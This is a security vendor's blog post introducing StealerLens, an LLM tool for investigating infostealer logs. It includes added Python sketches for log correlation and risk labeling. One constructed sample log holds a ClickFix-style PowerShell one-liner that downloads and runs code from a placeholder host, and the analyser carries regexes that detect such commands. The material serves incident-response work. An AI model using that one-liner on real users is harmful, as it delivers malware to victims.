
By Olivier Bilodeau, Principal Cybersecurity Researcher, co-authored with Estelle Ruellan, Threat Intelligence Researcher
Over 50 million stealer logs surfaced on underground channels in 2025. Each one is dozens of file artifacts containing tens of thousands of lines of browser history, session cookies, and stolen browser credentials. Somewhere in that pile sits the answer to the question every incident responder actually cares about: how did this machine get infected, and what is the impact on my organization? Gathering that intelligence by hand, though, is so slow that in practice almost nobody does.
That is the problem StealerLens was built to solve. Today, alongside our FIRSTCON presentation Introducing StealerLens: An LLM-Powered Forensics Microscope to Accelerate InfoStealer Investigations on Wednesday, June 17, we’re making the tool available to the community.
From 5,000 Pages of Raw Log to a Documented Infection Hypothesis in Minutes
StealerLens uses a layered LLM architecture to read stealer logs and produce the infection source, delivery vector, malware identity, and the specific evidence lines that support each conclusion. Free for verified cybersecurity professionals.
But What are Stealer Logs?
A stealer log is the output of an infostealer malware that quietly harvests everything of value from a victim’s machine (saved browser passwords, session cookies, autofill data, cryptocurrency wallets, and personal files) and then packages it all for sale or reuse. Every successful infection produces one log. Those logs are traded in bulk on dark web markets and Telegram channels, a business big enough to draw global law enforcement takedowns and consequential enough that hundreds of thousands of corporate credentials routinely surface in the trade.
These infections are everywhere right now, and the delivery technique dominating the moment is ClickFix: a fake CAPTCHA or verification prompt that tricks the victim into copying a malicious PowerShell command and running it themselves. It is used to push infostealers through lures as ordinary as fake TikTok “activation” tutorials. The lure changes; the result is the same. Another log, another victim.
What is StealerLens?
StealerLens reads a stealer log and produces a documented infection hypothesis in minutes. It tells you the most likely source of the infection, what the malware was disguised as, the behaviors it exhibited, the delivery vector, and it points to the specific lines in the log that support each conclusion.
[Figure: Preview of StealerLens]
The last part matters as much as the rest. StealerLens is not a black box that hands you a verdict; it hands you a hypothesis with its evidence attached, so you can confirm it, challenge it, or throw it out. The analyst is not replaced. The analyst is armed to go faster and further.
Stealer Logs are Forensic Goldmines, Not Just Stolen Credentials
Most people look at a stealer log and see a trove of stolen passwords and cookies. That’s the obvious value, and it’s why these logs get bought and sold. But it undersells what’s actually sitting in the file.
A stealer log is a crime scene the malware documented itself. Buried among the credentials are artifacts that describe the infection as it happened. Once you learn to read them, every component tells you something:
- User Information.txt: a snapshot of the compromised system at the moment of infection: the malware’s execution path, the infection date, hardware and user details, and often the malware family itself. This is the starting point for any investigation.
- Software.txt: the installed-software inventory. It reveals vulnerable applications, software the malware was masquerading as, and whether security tooling like an EDR was even present.
- Processes.txt: a photograph of running processes at infection time. Here you catch the malware in the act: execution indicators, post-exploitation activity such as PowerShell, and sometimes process injection.
- Browser histories: URLs, page titles, and timestamps that let you reconstruct searches and downloads. This is often where the delivery vector hides: a malicious download site, a phishing page, or a tell-tale search for “cracked software.”
- Clipboard.txt: the contents of the clipboard at infection time. Remarkably often, it’s the malicious URL or PowerShell payload the victim copied moments before getting infected.
- Infection screenshots: when present, the jackpot. A capture of the victim’s desktop at the moment of compromise, frequently with the fake installer, malicious site, or bogus tutorial still on screen.
The clues are there. The cruel part is that finding them means reading the entire log, hundreds and sometimes thousands of lines, and then correlating across files, because one artifact often recontextualizes another you’d already dismissed as benign. It’s a needle-in-a-haystack job that’s slow, error-prone, and nearly impossible to do at scale.
[Figure: Analysis from StealerLens]
Consider the raw volume. A compressed 2.3 MB stealer log expands to 8,698,701 characters of text including spaces, roughly 1.5 million words, or about 5,000 pages. Reading a single log straight through would be like reading the novel Dune ten times over (the audiobook runs 21 hours; now imagine that 10 times) or the Bible twice. Of course nobody reads a stealer log front to back like a novel, but that is still an enormous amount of text to wade through, sort, dismiss, and investigate.
How It Works
[Figure: Demo of StealerLens]
StealerLens uses a layered LLM architecture: one artifact, one specialized prompt. Each log component is handed to a prompt tuned specifically for it (the questions you ask of a process list are not the questions you ask of a browser history), and a final master prompt correlates all of those outputs into a single coherent infection narrative. We chose this modular design over one giant monolithic prompt for concrete reasons:
- Each layer stays focused on a single kind of evidence, so it’s more precise
- Each layer is easier to maintain
- Each can evolve independently as malware families and log formats change, without forcing a rewrite of the whole system
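As an added example (my own code, not StealerLens, whose prompts the post does not publish), the Python sketch below mirrors the layered design with plain heuristics standing in for the LLM prompts: one analyser per artifact from the list above, each emitting evidence records that carry the file name and line number, and a master step that correlates across files (clipboard host against browsing history, execution path against the process list) into a hypothesis, or reports insufficient evidence when nothing supports one. The sample log, the domains (reserved .invalid TLD), the regular expressions and the artifact file names it assumes are constructed for the demonstration and are not a real log.

```python
import re
from dataclasses import dataclass, asdict
from urllib.parse import urlparse

# Constructed sample (not a real stealer log); artifact names follow the post's list,
# domains use the reserved .invalid TLD.
SAMPLE_LOG = {
    "User Information.txt": "Path: C:\\Users\\victim\\Downloads\\VideoEditor_Pro_Setup.exe\n"
                            "Date: 2025-03-14 09:41:12\nUserName: victim\n",
    "Processes.txt": "explorer.exe\nchrome.exe\npowershell.exe\nVideoEditor_Pro_Setup.exe\n",
    "Clipboard.txt": 'powershell -w hidden -c "irm http://verify-human.example.invalid/v | iex"\n',
    "History.txt": "2025-03-14 09:35:02 | video editor pro crack | https://search.example.invalid/?q=crack\n"
                   "2025-03-14 09:36:48 | VideoEditor Pro FREE | https://free-soft.example.invalid/ve\n"
                   "2025-03-14 09:40:30 | Verify you are human | http://verify-human.example.invalid/\n",
}

@dataclass(frozen=True)
class Evidence:
    artifact: str   # file the line came from
    line_no: int    # 1-based line inside that file, so the analyst can check it
    text: str       # the line itself
    note: str       # why the layer flagged it

def _lines(text):
    return [(n, l) for n, l in enumerate(text.splitlines(), 1) if l.strip()]

URL_RE = re.compile(r"https?://[^\s|\"']+")

def _hosts(text):
    return {urlparse(u).hostname for u in URL_RE.findall(text)} - {None}

# Layer 1: one artifact, one specialised analyser (heuristics standing in for the prompts)
def analyze_user_info(text):
    out = []
    for n, line in _lines(text):
        key, _, value = line.partition(":")
        if key.strip().lower() == "path":
            note = "execution path"
            if re.search(r"\\(Downloads|Temp|AppData)\\", value, re.I):
                note += " under a user-writable directory"
            out.append(Evidence("User Information.txt", n, line, note))
        elif key.strip().lower() == "date":
            out.append(Evidence("User Information.txt", n, line, "infection timestamp"))
    return out

SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

def analyze_processes(text):
    return [Evidence("Processes.txt", n, l, "script host running at infection time")
            for n, l in _lines(text) if l.strip().lower() in SCRIPT_HOSTS]

PASTE_RE = re.compile(r"powershell.*\b(irm|iwr|iex|invoke-(webrequest|expression))\b", re.I)

def analyze_clipboard(text):
    return [Evidence("Clipboard.txt", n, l, "PowerShell download-and-run one-liner in clipboard")
            for n, l in _lines(text) if PASTE_RE.search(l)]

LURE_RE = re.compile(r"\b(crack(ed)?|keygen|activat(or|ion)|verify you are human)\b", re.I)

def analyze_history(text):
    return [Evidence("History.txt", n, l, "lure-style search or page title")
            for n, l in _lines(text) if LURE_RE.search(l)]

# Layer 2: master correlation across artifacts
def correlate(log):
    user = analyze_user_info(log.get("User Information.txt", ""))
    clips = analyze_clipboard(log.get("Clipboard.txt", ""))
    hist = analyze_history(log.get("History.txt", ""))
    evidence, vector, source = list(user), None, None

    # Strongest signal: a pasted one-liner whose host was also visited just before infection
    for c in clips:
        match = next((h for h in hist if _hosts(c.text) & _hosts(h.text)), None)
        if match:
            vector, source, evidence = "ClickFix-style copy/paste", match.text, evidence + [c, match]
            break
    # Weaker signal: cracked-software lure with the payload dropped into a user-writable folder
    if vector is None:
        cracks = [h for h in hist if re.search(r"crack|keygen", h.text, re.I)]
        if cracks and any("user-writable" in u.note for u in user):
            vector, source, evidence = "cracked-software download", cracks[0].text, evidence + cracks
    # Cross-file corroboration: is the executable from User Information.txt still in Processes.txt?
    exe = next((re.split(r"[\\/]", u.text)[-1].strip().lower() for u in user if "execution path" in u.note), None)
    procs_txt = log.get("Processes.txt", "")
    if exe:
        evidence += [Evidence("Processes.txt", n, l, "dropped executable still running")
                     for n, l in _lines(procs_txt) if l.strip().lower() == exe]
    evidence += analyze_processes(procs_txt)

    verdict = "hypothesis" if vector else "insufficient evidence"  # say so rather than guess
    return {"verdict": verdict, "delivery_vector": vector, "source": source,
            "evidence": [asdict(e) for e in evidence]}

if __name__ == "__main__":
    import json
    print(json.dumps(correlate(SAMPLE_LOG), indent=2))
```

Running `correlate(SAMPLE_LOG)` yields a ClickFix-style hypothesis whose evidence list points to the clipboard line and the history entry that share a host, plus the dropped executable still present in Processes.txt; a log whose only signal is a benign-looking execution path comes back as "insufficient evidence" instead of a guessed vector. Each analyser can be swapped or retuned on its own, which is the maintainability argument the modular design makes.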
The screenshot-analysis layer will look familiar to anyone who caught our Black Hat USA 2025 presentation, Hackers Dropping Mid-Heist Selfies: LLM Identifies Infostealer Infection Vectors and Extracts IoCs. That pipeline is now integrated directly into StealerLens as one of its layers.
We’re not dumping every prompt into this post. The full set, with the reasoning behind each one, lives in the talk materials and PDF, and you can find those alongside the recording of the talk. (If you’re reading this right at launch and the FIRSTCON recording isn’t up yet, the slides and PDF are available now, and we’ll link the video here as soon as it posts.)
Does it Actually Work?
We didn’t stop at a handful of test cases. We pointed StealerLens at more than 10,000 real stealer logs to profile victims at scale, work we presented at the RSAC Conference and wrote up in Victim Profiling with Stealer Malware.
What we care about most, though, is how the system behaves when it isn’t sure. Across our trials, when a log was too incomplete to support a conclusion, StealerLens said so rather than inventing one. When the evidence pointed two plausible ways at once, it laid out both hypotheses and left the call to the analyst. A confident “I don’t know” is worth far more than a fabricated answer that wastes an hour of verification. That is exactly the job: clear the brush and support the human, not pretend to replace them.
Getting Access
StealerLens is free for verified cybersecurity professionals. That means our customers, and members of our Flare Academy Discord who have gone through the verification process to become verified practitioners. You might be wondering why we are gating access to this at all.
It’s because the tool would be just as useful to the other side. In a threat actor’s hands, StealerLens would let them triage their own stealer logs faster, surface the high-value victims quicker, and learn how to harden their logs against exactly this kind of analysis, making everyone’s job harder. Reserving access for verified practitioners is how we avoid handing both sides the same accelerant and kicking off an arms race we’d rather not feed.
Here’s how to get in:
- Join the Flare Academy Discord and follow the instructions in the #verify-here channel.
- Get verified. Verification is based on your work email, LinkedIn, and employer, plus a short video verification call. Full details: become a verified community member.
- Once you hold the verified-practitioners role, authenticate at stealerlens.labs.flare.io and start analyzing.
Existing Flare customers can request the StealerLens Labs feature from their customer success representative. It will be integrated into their platform free of charge.
Where this is Going
StealerLens is a freely accessible Flare experiment. We integrated a feedback mechanism into it and we will listen to community feedback. In the short term, development will focus on risk-analysis labeling: automatically tagging logs with the attributes that determine how dangerous a given infection actually is, such as has-vpn-access, has-corporate-credentials, is-developer, and has-cloud-admin-access. Those labels are designed to feed agentic triage tools downstream, so the worst infections rise to the top of the queue automatically instead of waiting for a human to find them.
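To make the labeling idea concrete, here is an added Python example (mine, not Flare's; the post names the four labels but not how StealerLens will derive them) that assigns those labels from a constructed Software.txt inventory and a simplified list of (url, username) credential pairs, then ranks a batch of logs so the highest-risk infection comes off the queue first. The signal tables, weights, the `.example` domains and the sample logs are assumptions for illustration.

```python
from urllib.parse import urlparse

# Hypothetical signal tables and weights: assumptions for illustration, not StealerLens' definitions.
VPN_SOFTWARE = ("openvpn", "globalprotect", "anyconnect", "forticlient", "wireguard")
DEV_SOFTWARE = ("visual studio code", "git for windows", "docker desktop", "pycharm")
DEV_HOSTS = {"github.com", "gitlab.com", "bitbucket.org"}
CLOUD_ADMIN_HOSTS = {"console.aws.amazon.com", "portal.azure.com", "console.cloud.google.com"}
FREEMAIL = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com"}
WEIGHTS = {"has-cloud-admin-access": 50, "has-vpn-access": 30,
           "has-corporate-credentials": 20, "is-developer": 10}

def label_log(software_txt, credentials):
    """Return the set of risk labels for one log.

    software_txt: contents of Software.txt; credentials: (url, username) pairs,
    a simplified stand-in for whatever password artifact a given stealer family writes."""
    software = software_txt.lower()
    hosts = {urlparse(url).hostname or "" for url, _ in credentials}
    labels = set()
    if any(s in software for s in VPN_SOFTWARE) or any(h.startswith("vpn.") for h in hosts):
        labels.add("has-vpn-access")
    if any(s in software for s in DEV_SOFTWARE) or hosts & DEV_HOSTS:
        labels.add("is-developer")
    if hosts & CLOUD_ADMIN_HOSTS:
        labels.add("has-cloud-admin-access")
    # A saved login whose username is an e-mail on a non-freemail domain is treated as corporate
    if any("@" in u and u.rsplit("@", 1)[1].lower() not in FREEMAIL for _, u in credentials):
        labels.add("has-corporate-credentials")
    return labels

def risk_score(labels):
    return sum(WEIGHTS[l] for l in labels)

def prioritize(logs):
    """logs: {name: (software_txt, credentials)}; returns names, most dangerous first."""
    scored = {name: risk_score(label_log(*data)) for name, data in logs.items()}
    return sorted(scored, key=lambda n: (-scored[n], n))

# Constructed sample logs (domains under the reserved .example TLD)
SAMPLE_LOGS = {
    "log-a": ("Google Chrome [123.0]\nOpenVPN Connect [3.4]\nVisual Studio Code [1.88]\n",
              [("https://console.aws.amazon.com/", "ops-admin@corp.example"),
               ("https://github.com/login", "dev@corp.example")]),
    "log-b": ("Google Chrome [123.0]\nSpotify [1.2]\n",
              [("https://accounts.google.com/", "someone@gmail.com")]),
    "log-c": ("Google Chrome [123.0]\n",
              [("https://vpn.corp.example/", "jdoe@corp.example")]),
}

if __name__ == "__main__":
    for name in prioritize(SAMPLE_LOGS):
        print(name, risk_score(label_log(*SAMPLE_LOGS[name])), sorted(label_log(*SAMPLE_LOGS[name])))
```

The labels are deliberately boolean so a downstream triage agent can filter on them, and the score only orders the queue; an analyst still opens the log, which is why the evidence-carrying output of the analysis step matters more than the number.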
If you want the deeper technical dive (the full architecture, every prompt, and the engineering decisions and dead ends behind them), that’s what the FIRSTCON talk is for. The debrushing that used to take hours now takes minutes. Come see how.
We firmly believe that incident responders should have access to the best tools and the best information so they can do their job faster. StealerLens is part of that.